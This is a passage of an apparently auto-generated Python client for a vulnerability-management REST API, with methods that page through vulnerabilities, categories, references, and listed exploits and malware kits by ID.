files=local_var_files,
response_type='PageOfVulnerability', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
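# Usage sketch: walking every page of vulnerabilities. The `resources` and
# `page.total_pages` attributes are assumptions about the generated
# PageOfVulnerability model, not something this module itself guarantees:
#
#     page_num = 0
#     while True:
#         result = api.get_vulnerabilities(page=page_num, size=500)
#         for vuln in result.resources:
#             handle(vuln)  # handle() is a placeholder for caller logic
#         page_num += 1
#         if page_num >= result.page.total_pages:
#             break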
def get_vulnerability(self, id, **kwargs): # noqa: E501
"""Vulnerability # noqa: E501
Returns the details for a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: Vulnerability
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability # noqa: E501
Returns the details for a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: Vulnerability
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Vulnerability', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
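# Usage sketch contrasting the two return shapes (placeholder id). The plain
# method returns only the deserialized body, while the *_with_http_info
# variant returns a (data, status, headers) tuple unless
# _return_http_data_only is passed:
#
#     vuln = api.get_vulnerability('example-vuln-id', _request_timeout=30)
#     data, status, headers = api.get_vulnerability_with_http_info('example-vuln-id')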
def get_vulnerability_categories(self, **kwargs): # noqa: E501
"""Categories # noqa: E501
Returns all vulnerability categories that can be assigned to a vulnerability. These categories group and label vulnerabilities by general purpose, affected systems, vendor, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_categories(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_categories_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_categories_with_http_info(**kwargs) # noqa: E501
return data
def get_vulnerability_categories_with_http_info(self, **kwargs): # noqa: E501
"""Categories # noqa: E501
Returns all vulnerability categories that can be assigned to a vulnerability. These categories group and label vulnerabilities by general purpose, affected systems, vendor, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_categories_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_categories" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_categories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerabilityCategory', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_category(self, id, **kwargs): # noqa: E501
"""Category # noqa: E501
Returns the details for a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: VulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_category_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_category_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_category_with_http_info(self, id, **kwargs): # noqa: E501
"""Category # noqa: E501
Returns the details for a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: VulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_category" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_category`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_categories/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VulnerabilityCategory', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_category_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Category Vulnerabilities # noqa: E501
Returns hypermedia links to the vulnerabilities that are in a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_category_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_category_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_category_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Category Vulnerabilities # noqa: E501
Returns hypermedia links to the vulnerabilities that are in a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_category_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_category_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_categories/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithVulnerabilityNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
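# Usage sketch (placeholder category id). Note the response carries hypermedia
# links to the member vulnerabilities rather than full vulnerability records:
#
#     refs = api.get_vulnerability_category_vulnerabilities(42)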
def get_vulnerability_exploits(self, id, **kwargs): # noqa: E501
"""Vulnerability Exploits # noqa: E501
Returns the exploits that can be used to exploit a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_exploits(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_exploits_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_exploits_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_exploits_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Exploits # noqa: E501
Returns the exploits that can be used to exploit a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_exploits_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_exploits" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_exploits`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/exploits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfExploit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
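# Usage sketch combining the required path parameter with paging (illustrative
# values only):
#
#     exploits = api.get_vulnerability_exploits('example-vuln-id', page=0, size=50)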
def get_vulnerability_malware_kits(self, id, **kwargs): # noqa: E501
"""Vulnerability Malware Kits # noqa: E501
Returns the malware kits that are known to be used to exploit the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_malware_kits(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_malware_kits_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_malware_kits_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_malware_kits_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Malware Kits # noqa: E501
Returns the malware kits that are known to be used to exploit the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_malware_kits_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_malware_kits" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_malware_kits`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/malware_kits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfMalwareKit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_reference(self, id, **kwargs): # noqa: E501
"""Reference # noqa: E501
Returns an external vulnerability reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability reference. (required)
:return: VulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_reference_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_reference_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_reference_with_http_info(self, id, **kwargs): # noqa: E501
"""Reference # noqa: E501
Returns an external vulnerability reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability reference. (required)
:return: VulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_references/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VulnerabilityReference', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_reference_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Reference Vulnerabilities # noqa: E501
Returns the vulnerabilities that are referenced by an external reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability reference. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_reference_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_reference_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_reference_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Reference Vulnerabilities # noqa: E501
Returns the vulnerabilities that are referenced by an external reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability reference. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_reference_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_reference_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_references/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerability', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_references(self, **kwargs): # noqa: E501
"""References # noqa: E501
Returns the external references that may be associated with a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_references_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_references_with_http_info(**kwargs) # noqa: E501
return data
def get_vulnerability_references_with_http_info(self, **kwargs): # noqa: E501
"""References # noqa: E501
Returns the external references that may be associated with a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_references" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_references', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerabilityReference', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_references1(self, id, **kwargs): # noqa: E501
"""Vulnerability References # noqa: E501
Returns the external references that may be associated with a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references1(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_references1_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_references1_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_references1_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability References # noqa: E501
Returns the external references that may be associated with a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_references1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_references1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/references', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
